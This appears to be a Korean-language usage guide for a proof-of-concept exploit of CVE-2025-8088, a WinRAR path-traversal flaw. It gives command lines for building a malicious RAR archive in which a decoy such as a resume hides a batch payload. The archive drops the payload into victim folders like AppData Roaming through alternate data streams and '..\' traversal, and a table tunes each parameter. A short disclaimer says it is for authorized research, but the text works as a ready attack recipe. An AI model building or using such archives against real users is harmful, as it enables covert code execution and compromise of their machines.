
본 PoC는 승인된 연구 및 테스트용입니다. CVE-2025-8088은 활발히 악용되고 있으며, 오용 시 법률 위반이나 피해를 초래할 수 있습니다. 의심스러운 RAR을 피하려면 WinRAR 7.13+로 업데이트하세요.
Exploit_cve_2025_8088.ps1
python poc.py

# Basic usage (auto-discover rar.exe)
python poc.py --decoy resume.txt --payload payload.bat --drop "C:\Users\Victim\Documents"
# Full custom configuration
python poc.py \
--decoy document.pdf \
--payload script.bat \
--drop "C:\Users\Victim\AppData\Roaming" \
--rar "C:\Program Files\WinRAR\rar.exe" \
--out malicious.rar \
--workdir ./build \
--placeholder_len 150 \
--max_up 20
| Argument | Description | Example |
|---|
--decoy | 디코이 파일 경로 (존재하지 않으면 생성됨) | resume.txt |
--payload | 페이로드 파일 경로 (존재하지 않으면 생성됨) | payload.bat |
--drop | 페이로드가 추출될 대상 디렉터리의 절대 경로 | C:\Users\Victim\Documents |
| Argument | Description | Default Value | Notes |
|---|
--rar | rar.exe 경로 | 자동 탐색 | 일반적인 위치 및 PATH 확인 |
--out | 출력 RAR 파일 이름 | poc-cve-2025-8088.rar | 최종 악성 아카이브 |
--workdir | 임시 파일 작업 디렉터리 | 현재 디렉터리 (.) | |
--placeholder_len | ADS 플레이스홀더 길이 | max(len(target_path), 128) | 길수록 더 안정적인 탐색 |
--max_up | 상위 디렉터리 탐색 횟수 (..\) | 16 | 최소 8 권장 |
--base_out | 중간 기본 RAR 파일 이름 | <out>.base.rar | 임시 파일, 이후 삭제됨 |